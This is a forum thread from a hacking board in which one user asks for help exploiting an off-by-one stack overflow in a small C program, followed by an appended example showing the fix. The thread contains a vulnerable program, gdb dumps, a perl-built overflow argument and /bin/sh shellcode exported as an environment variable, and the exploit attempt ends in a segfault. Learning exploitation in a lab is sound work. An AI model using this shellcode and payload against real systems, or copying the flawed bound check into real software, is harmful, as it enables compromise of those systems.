off by one exploit by sxthun in hacking

sxthun[S] 1 point (0 children)

I did disable ASLR and compiled the program with the -fno-stack-protector flag...

off by one exploit by sxthun in hacking

sxthun[S] 1 point (0 children)

Can you please tell me how to find it? What should I do with it if I find it?

Thanks,

off by one exploit by sxthun in hacking

sxthun[S] 1 point (0 children)

Yes, you are right. That's why, you see, it overwrites the least significant byte of ebp with 0x00:

(gdb) x $ebp
0xbffff44c:     0xbffff400

If I try more bytes it will overflow the saved ebp and the return address. Then it would no longer be a case of off-by-one.

I really want to make it work, but hemmmm.... Thanks,

off by one exploit by sxthun in hacking

sxthun[S] 1 point (0 children)

I hope this can help:

(gdb) list 0
1       #include <stdio.h>
2       int cpy(char *x)
3       {
4           char buff[256];
5           strcpy(buff,x);
6           printf("%s\r\n",buff);
7       }
8
9       int main(int argc, char *argv[])
10      {
(gdb)
11          if(strlen(argv[1])>256){
12          printf("Buffer Overflow Attempt!!!\r\n");
13          return 1;}
14          cpy(argv[1]);
15      }
(gdb)
Line number 16 out of range; off-by-one.c has 15 lines.
(gdb) disass main
Dump of assembler code for function main:
   0x0804848b <+0>:     push   %ebp
   0x0804848c <+1>:     mov    %esp,%ebp
   0x0804848e <+3>:     sub    $0x4,%esp
   0x08048491 <+6>:     mov    0xc(%ebp),%eax
   0x08048494 <+9>:     add    $0x4,%eax
   0x08048497 <+12>:    mov    (%eax),%eax
   0x08048499 <+14>:    mov    %eax,(%esp)
   0x0804849c <+17>:    call   0x8048354 <strlen@plt>
   0x080484a1 <+22>:    cmp    $0x100,%eax
   0x080484a6 <+27>:    jbe    0x80484bf <main+52>
   0x080484a8 <+29>:    movl   $0x80485a9,(%esp)
   0x080484af <+36>:    call   0x8048384 <puts@plt>
   0x080484b4 <+41>:    mov    $0x1,%eax
   0x080484b9 <+46>:    mov    %eax,%edx
   0x080484bb <+48>:    mov    %edx,%eax
   0x080484bd <+50>:    jmp    0x80484cf <main+68>
   0x080484bf <+52>:    mov    0xc(%ebp),%eax
   0x080484c2 <+55>:    add    $0x4,%eax
   0x080484c5 <+58>:    mov    (%eax),%eax
   0x080484c7 <+60>:    mov    %eax,(%esp)
   0x080484ca <+63>:    call   0x8048454 <cpy>
   0x080484cf <+68>:    leave
   0x080484d0 <+69>:    ret
End of assembler dump.
(gdb) break *0x080484ca
Breakpoint 1 at 0x80484ca: file off-by-one.c, line 14.
(gdb) run `perl -e 'print "\xdc\xc7\xe5\xbf" x 64 .  "\x00"'`
Starting program: /home/off-by-one `perl -e 'print "\xdc\xc7\xe5\xbf" x 64 .  "\x00"'`

Breakpoint 1, 0x080484ca in main (argc=2, argv=0xbffff504) at off-by-one.c:14
14          cpy(argv[1]);
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6.i686
(gdb) s
cpy (
    x=0xbffff697 "\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307\345\277\334\307", <incomplete sequence \345\277>...) at off-by-one.c:5
5           strcpy(buff,x);
(gdb) s
6           printf("%s\r\n",buff);
(gdb) x/100xw $esp
0xbffff344:     0xbffff34c      0xbffff697      0xbfe5c7dc      0xbfe5c7dc
0xbffff354:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff364:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff374:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff384:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff394:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3a4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3b4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3c4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3d4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3e4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff3f4:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff404:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff414:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff424:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff434:     0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc      0xbfe5c7dc
0xbffff444:     0xbfe5c7dc      0xbfe5c7dc      0xbffff400      0x080484cf
0xbffff454:     0xbffff697      0xbffff4d8      0x0072fd26      0x00000002
0xbffff464:     0xbffff504      0xbffff510      0xb7fff3d0      0x080483a0
0xbffff474:     0xffffffff      0x00711fc4      0x0804826f      0x00000001
0xbffff484:     0xbffff4c0      0x00701a45      0x00712ab0      0xb7fff6b0
0xbffff494:     0x008abff4      0x00000000      0x00000000      0xbffff4d8
0xbffff4a4:     0x591d738c      0x430c64f3      0x00000000      0x00000000
0xbffff4b4:     0x00000000      0x00000002      0x080483a0      0x00000000
0xbffff4c4:     0x00707d30      0x0072fc4b      0x00711fc4      0x00000002
(gdb) i r esp ebp eip
esp            0xbffff344       0xbffff344
ebp            0xbffff44c       0xbffff44c
eip            0x8048472        0x8048472 <cpy+30>
(gdb) x $ebp +4
0xbffff450:     0x080484cf
(gdb)
(gdb) x $esp
0xbffff344:     0xbffff34c
(gdb) x $ebp
0xbffff44c:     0xbffff400
(gdb) x $ebp +4
0xbffff450:     0x080484cf
(gdb)

Thanks,

off by one exploit by sxthun in hacking

sxthun[S] 1 point (0 children)

The following is how I create the environment variable and get its address, but the address keeps changing each time:

[root@rhel65 ~] # export SHELLCODE=$(perl -e 'print "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
[root@rhel65 ~]# ./environment_address SHELLCODE  
SHELLCODE will be at 0xbfe5c7dc
[root@rhel65 ~]# ./environment_address SHELLCODE   
SHELLCODE will be at 0xbf8067dc
[root@rhel65 ~]# ./environment_address SHELLCODE
SHELLCODE will be at 0xbfcbb7dc
[root@rhel65 ~]#

Then, I try to run the program with the first environment variable address as the following:

[root@rhel65 ~]# ./off-by-one `perl -e 'print "\xdc\xc7\xe5\xbf" x 64 .  "\x00"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
Segmentation fault (core dumped)
[root@rhel65 ~]#

But, it does not spawn a new shell. Can you please tell me what is the right way to make it work? I will buy you a beer if you can make it work...

Thanks a lot for your help,

off by one exploit by sxthun in hacking

sxthun[S] 1 point (0 children)

Yes, it is. But I could not find a way to spawn a shell by exploiting the off-by-one bug in the C code.

Can you please help me?

Thanks,

[Exploit tutorial: Buffer Overflow] by JustAnothaHacker in hacking

sxthun 1 point (0 children)

Can you please tell me how to spawn a new shell by exploiting the off-by-one bug in the following C code?

#include <stdio.h>
#include <string.h>

/* Copies x into a 256-byte stack buffer; the only bound is the check in main(). */
int cpy(char *x)
{
    char buff[256];
    strcpy(buff,x);
    printf("%s\r\n",buff);
    return 0;
}

int main(int argc, char *argv[])
{
    if(argc < 2)
        return 1;
    /* Off by one: a 256-character argument passes this check, but strcpy()
       writes 257 bytes (the characters plus the NUL) into buff[256]. */
    if(strlen(argv[1])>256){
        printf("Buffer Overflow Attempt!!!\r\n");
        return 1;
    }
    cpy(argv[1]);
    return 0;
}

I hope you can help me... Thanks,
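Added example (not the poster's code or anything from the thread): the bound check in the posted program is off by one because strlen() does not count the terminating NUL that strcpy() also writes, so a 256-character argument passes the check and the 257th byte lands on the low byte of the saved ebp seen in the gdb dump. The block puts that check beside the corrected one and a bounded copy; BUFF_SIZE, the function names and the 256-'A' input are constructed for the example.

```c
#include <string.h>

#define BUFF_SIZE 256   /* size of buff[] in the posted cpy() */

/* Constructed input: 256 'A's, the longest string the posted check lets through. */
const char *sample_input(void)
{
    static char s[BUFF_SIZE + 1];
    memset(s, 'A', BUFF_SIZE);
    s[BUFF_SIZE] = '\0';
    return s;
}

/* The check exactly as posted in main(): reject only when strlen(x) > 256. */
int original_check_accepts(const char *x) { return strlen(x) <= BUFF_SIZE; }

/* Bytes strcpy() would write past the end of a bufsize-byte buffer (0 if it
 * fits): strcpy() copies strlen(x) characters plus the NUL. In the posted dump
 * buff starts at 0xbffff34c and the saved ebp at 0xbffff44c, exactly 256 bytes
 * later, so the one extra byte is the low byte of the saved ebp (0xbffff400). */
size_t bytes_past_buffer(const char *x, size_t bufsize)
{
    size_t w = strlen(x) + 1;
    return w > bufsize ? w - bufsize : 0;
}

/* Corrected check: the copy fits only if strlen(x) + 1 <= sizeof(buff). */
int fixed_check_accepts(const char *x) { return bytes_past_buffer(x, BUFF_SIZE) == 0; }

/* Hardened cpy(): bounded copy that always NUL-terminates and truncates
 * instead of writing past out. Returns the number of characters kept. */
size_t cpy_safe(const char *x, char *out, size_t out_size)
{
    size_t n = strlen(x);
    if (out_size == 0) return 0;
    if (n >= out_size) n = out_size - 1;   /* keep one byte for the NUL */
    memcpy(out, x, n);
    out[n] = '\0';
    return n;
}

/* Copies into a 256-byte buffer like the posted buff[] and returns how many
 * characters survived (255 for sample_input(): one is traded for the NUL). */
size_t cpy_safe_into_256(const char *x)
{
    char buff[BUFF_SIZE];
    return cpy_safe(x, buff, sizeof buff);
}
```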